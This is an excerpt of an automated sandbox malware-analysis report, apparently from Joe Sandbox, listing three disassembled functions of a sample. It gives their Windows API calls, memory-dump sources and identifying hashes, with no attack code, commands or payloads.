                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID: %.3d$X64
                                                                      • API String ID: 481472006-1077770165
                                                                      • Opcode ID: 6d7addf51120e9b79eb79124a2af4703b31f33bb097497a187d48aa0a2fc4c34
                                                                      • Instruction ID: d5b19dab9205145a19cf498dd37776c0f830b82df140e1c0b224945ffe48b304
                                                                      • Opcode Fuzzy Hash: 6d7addf51120e9b79eb79124a2af4703b31f33bb097497a187d48aa0a2fc4c34
                                                                      • Instruction Fuzzy Hash: DFD012B1849218F9CF50A6D0DC459FDB37CFB59301F608453F816A1040D638D5886761
                                                                      Function 00A52322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5232C
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A5233F
                                                                        • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 2ffa984c5d750d6af02ebd1e0951de130f21050ae729f9af6e7b6099805c7186
                                                                      • Instruction ID: 2d63dc13b102921bb690f79d62a7dca35cf135305862f91f940075ea895b0193
                                                                      • Opcode Fuzzy Hash: 2ffa984c5d750d6af02ebd1e0951de130f21050ae729f9af6e7b6099805c7186
                                                                      • Instruction Fuzzy Hash: 40D012763D4310BBE664F7B0ED1FFC6BA14BB00B21F0049167745AA1D4D9F4A842CB54
                                                                      Function 00A52356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5236C
                                                                      • PostMessageW.USER32(00000000), ref: 00A52373
                                                                        • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: c2fa820f661dc520790992be051a232a75c2a2d56232fdc7f44a5379de92883a
                                                                      • Instruction ID: f06c07b333be2a754f73efbf7f6783ff241464a44f5906d838307a4f12b73e85
                                                                      • Opcode Fuzzy Hash: c2fa820f661dc520790992be051a232a75c2a2d56232fdc7f44a5379de92883a
                                                                      • Instruction Fuzzy Hash: 9ED0C9723C13107AE664F7B0AD1FFC6A614AB04B21F4049167645AA1D4D9A4A8428A54
                                                                      Function 009FBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009FBE93
                                                                      • GetLastError.KERNEL32 ref: 009FBEA1
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009FBEFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 3fe1b8ecdbac3aebe82e4fc5886336700ebf6bdbc0045c541e8c6caa7c5eb694
                                                                      • Instruction ID: d043f7311d4307ac971acbefa3b67ca1b94aa00f919fe0b7a439219412d267b1
                                                                      • Opcode Fuzzy Hash: 3fe1b8ecdbac3aebe82e4fc5886336700ebf6bdbc0045c541e8c6caa7c5eb694
                                                                      • Instruction Fuzzy Hash: 8241083460020EAFCF21AFA5CC54BBABBA9EF41720F144169FB599B2A1DB308D01CB50